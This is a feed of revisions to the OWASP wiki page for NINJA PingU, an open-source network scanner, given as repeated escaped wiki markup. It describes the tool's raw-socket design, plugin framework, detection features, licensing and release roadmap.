&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;p&amp;gt;&lt;br /&gt;
It also implements non-blocking networking I/O in the plugin's interface by means of epoll. Each component is multithreaded and they have built-in caches to minimize synchronization points. In addition, the results persistment operations are buffered to reduce disk writes.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Why NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
It has been developed to easily allow developers build their custom plugins. Samples of those can be found in its codebase. In addition, more information about NINJA PingU can be found in the FAQ and dev pages. NINJA PingU also integrates gnuplot to automatically plot the analysis results. In addition, a custom terminator has been embedded for enhanced data visualization.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;{{#ev:youtube|_vQwPWJp8Jc}}&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Read more about it in its home page at http://owasp.github.io/NINJA-PingU/ and its code base ad https://github.com/OWASP/NINJA-PingU&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU is free to use. It is licensed under the GNU GPL v3 License&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:25%;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:NINJA_PingU_DownaloadV1.jpg||150px|left||link=https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz]]&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
mirror [https://www.owasp.org/images/4/4f/NINJA-PinguV1.0.tar.gz download]&lt;br /&gt;
&lt;br /&gt;
== Features ==&lt;br /&gt;
&lt;br /&gt;
* Services Identification&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Embedded Devices Identification&lt;br /&gt;
* High Performance Framework&lt;br /&gt;
* Easily Plugin Integration&lt;br /&gt;
&lt;br /&gt;
== Links ==&lt;br /&gt;
* [https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz PingU V1.0]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ Home]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/faq.html FAQ]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/dev.html Dev]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/plugins.html Plugins]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [mailto:guifre.ruiz@owasp.org Guifre Ruiz]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width25%;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* Version 1.0 released&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
NINJA Pingu is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* Guifre Ruiz&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map  =&lt;br /&gt;
&lt;br /&gt;
==Release 1.0 ==&lt;br /&gt;
NINJA Pingu 1.0 has been released, which includes:&lt;br /&gt;
* Host Detection.&lt;br /&gt;
* Services Identification&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Special Network Devices (IP Cameras and Prinerts) Identification.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Release 1.1==&lt;br /&gt;
&lt;br /&gt;
The next release has not been scheduled yet.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of NINJA PingU is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=166172</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=166172"/>
				<updated>2014-01-21T11:08:57Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What's NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
'''NINJA-PingU Is Not Just a Ping Utility''' is a free open-source high performance network scanner tool for large scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin integration.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==How NINJA PingU Works?==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU takes advantage of raw sockets to reduce the three-way TCP handshake latency and it's state. Directly sending IP packets also avoids the TCP stack overhead.&lt;br /&gt;
&lt;br /&gt;
[[Image:NINJA_PingU_Design.jpg||550px|left||link=http://owasp.github.io/NINJA-PingU/images/NINJA%20PingU%20Architecture.png]]&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;p&amp;gt;&lt;br /&gt;
It also implements non-blocking networking I/O in the plugin's interface by means of epoll. Each component is multithreaded and they have built-in caches to minimize synchronization points. In addition, the results persistment operations are buffered to reduce disk writes.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Why NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
It has been developed to easily allow developers build their custom plugins. Samples of those can be found in its codebase. In addition, more information about NINJA PingU can be found in the FAQ and dev pages. NINJA PingU also integrates gnuplot to automatically plot the analysis results. In addition, a custom terminator has been embedded for enhanced data visualization.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;{{#ev:youtube|_vQwPWJp8Jc}}&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Read more about it in its home page at http://owasp.github.io/NINJA-PingU/ and its code base ad https://github.com/OWASP/NINJA-PingU&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU is free to use. It is licensed under the GNU GPL v3 License&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:25%;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:NINJA_PingU_DownaloadV1.jpg||150px|left||link=https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz]]&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
mirror [https://www.owasp.org/images/4/4f/NINJA-PinguV1.0.tar.gz download]&lt;br /&gt;
&lt;br /&gt;
== Features ==&lt;br /&gt;
&lt;br /&gt;
* Services Identification&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Embedded Devices Identification&lt;br /&gt;
* High Performance Framework&lt;br /&gt;
* Easily Plugin Integration&lt;br /&gt;
&lt;br /&gt;
== Links ==&lt;br /&gt;
* [https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz PingU V1.0]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ Home]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/faq.html FAQ]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/dev.html Dev]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/plugins.html Plugins]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [mailto:guifre.ruiz@owasp.org Guifre Ruiz]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width25%;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* Version 1.0 released&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
NINJA Pingu is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* Guifre Ruiz&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map  =&lt;br /&gt;
&lt;br /&gt;
==Release 1.0 ==&lt;br /&gt;
NINJA Pingu 1.0 has been released, which includes:&lt;br /&gt;
* Host Detection.&lt;br /&gt;
* Services Identification&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Special Network Devices (IP Cameras and Prinerts) Identification.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Release 1.1==&lt;br /&gt;
&lt;br /&gt;
The next release has not been scheduled yet.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of NINJA PingU is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=166171</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=166171"/>
				<updated>2014-01-21T11:06:44Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What's NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
'''NINJA-PingU Is Not Just a Ping Utility''' is a free open-source high performance network scanner tool for large scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin integration.&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|_vQwPWJp8Jc}}&lt;br /&gt;
&lt;br /&gt;
==How NINJA PingU Works?==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU takes advantage of raw sockets to reduce the three-way TCP handshake latency and it's state. Directly sending IP packets also avoids the TCP stack overhead.&lt;br /&gt;
&lt;br /&gt;
[[Image:NINJA_PingU_Design.jpg||550px|left||link=http://owasp.github.io/NINJA-PingU/images/NINJA%20PingU%20Architecture.png]]&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;p&amp;gt;&lt;br /&gt;
It also implements non-blocking networking I/O in the plugin's interface by means of epoll. Each component is multithreaded and they have built-in caches to minimize synchronization points. In addition, the results persistment operations are buffered to reduce disk writes.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Why NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
It has been developed to easily allow developers build their custom plugins. Samples of those can be found in its codebase. In addition, more information about NINJA PingU can be found in the FAQ and dev pages. NINJA PingU also integrates gnuplot to automatically plot the analysis results. In addition, a custom terminator has been embedded for enhanced data visualization.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div align=&amp;quot;center&amp;gt;&lt;br /&gt;
[[Image:NINJA_PingU_Performance.jpg||550px|link=http://owasp.github.io/NINJA-PingU/images/ninjapinguplot.png]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous chart corresponds to a 17 seconds analysis in a 100mbps network, where 10 million hosts were scanned and 9 thousand services identified. The analysis average speed was higher than half million hosts scanned per second.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Read more about it in its home page at http://owasp.github.io/NINJA-PingU/ and its code base ad https://github.com/OWASP/NINJA-PingU&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU is free to use. It is licensed under the GNU GPL v3 License&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:25%;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:NINJA_PingU_DownaloadV1.jpg||150px|left||link=https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz]]&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
mirror [https://www.owasp.org/images/4/4f/NINJA-PinguV1.0.tar.gz download]&lt;br /&gt;
&lt;br /&gt;
== Features ==&lt;br /&gt;
&lt;br /&gt;
* Services Discoverage&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Embedded Devices Identification&lt;br /&gt;
* High Performance Framework&lt;br /&gt;
* Easily Plugin Integration&lt;br /&gt;
&lt;br /&gt;
== Links ==&lt;br /&gt;
* [https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz PingU V1.0]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ Home]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/faq.html FAQ]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/dev.html Dev]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/plugins.html Plugins]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [mailto:guifre.ruiz@owasp.org Guifre Ruiz]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width25%;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* Version 1.0 released&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
NINJA Pingu is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* Guifre Ruiz&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map  =&lt;br /&gt;
&lt;br /&gt;
==Release 1.0 ==&lt;br /&gt;
NINJA Pingu 1.0 has been released, which includes:&lt;br /&gt;
* Host Discoverage.&lt;br /&gt;
* Services Discoverage&lt;br /&gt;
* Operating System Discoverage&lt;br /&gt;
* Special Network Devices (IP Cameras and Prinerts) Discoverage.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Release 1.1==&lt;br /&gt;
&lt;br /&gt;
The next release has not been scheduled yet.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of NINJA PingU is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=166170</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=166170"/>
				<updated>2014-01-21T11:04:52Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What's NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
'''NINJA-PingU Is Not Just a Ping Utility''' is a free open-source high performance network scanner tool for large scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin integration.&lt;br /&gt;
&lt;br /&gt;
==How NINJA PingU Works?==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU takes advantage of raw sockets to reduce the three-way TCP handshake latency and it's state. Directly sending IP packets also avoids the TCP stack overhead.&lt;br /&gt;
&lt;br /&gt;
[[Image:NINJA_PingU_Design.jpg||550px|left||link=http://owasp.github.io/NINJA-PingU/images/NINJA%20PingU%20Architecture.png]]&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;p&amp;gt;&lt;br /&gt;
It also implements non-blocking networking I/O in the plugin's interface by means of epoll. Each component is multithreaded and they have built-in caches to minimize synchronization points. In addition, the results persistment operations are buffered to reduce disk writes.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Why NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
It has been developed to easily allow developers build their custom plugins. Samples of those can be found in its codebase. In addition, more information about NINJA PingU can be found in the FAQ and dev pages. NINJA PingU also integrates gnuplot to automatically plot the analysis results. In addition, a custom terminator has been embedded for enhanced data visualization.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div align=&amp;quot;center&amp;gt;&lt;br /&gt;
[[Image:NINJA_PingU_Performance.jpg||550px|link=http://owasp.github.io/NINJA-PingU/images/ninjapinguplot.png]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous chart corresponds to a 17 seconds analysis in a 100mbps network, where 10 million hosts were scanned and 9 thousand services identified. The analysis average speed was higher than half million hosts scanned per second.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Read more about it in its home page at http://owasp.github.io/NINJA-PingU/ and its code base ad https://github.com/OWASP/NINJA-PingU&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU is free to use. It is licensed under the GNU GPL v3 License&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:25%;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:NINJA_PingU_DownaloadV1.jpg||150px|left||link=https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz]]&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
mirror [https://www.owasp.org/images/4/4f/NINJA-PinguV1.0.tar.gz download]&lt;br /&gt;
&lt;br /&gt;
== Features ==&lt;br /&gt;
&lt;br /&gt;
* Services Discoverage&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Embedded Devices Identification&lt;br /&gt;
* High Performance Framework&lt;br /&gt;
* Easily Plugin Integration&lt;br /&gt;
&lt;br /&gt;
== Links ==&lt;br /&gt;
* [https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz PingU V1.0]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ Home]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/faq.html FAQ]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/dev.html Dev]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/plugins.html Plugins]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [mailto:guifre.ruiz@owasp.org Guifre Ruiz]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width25%;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* Version 1.0 released&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
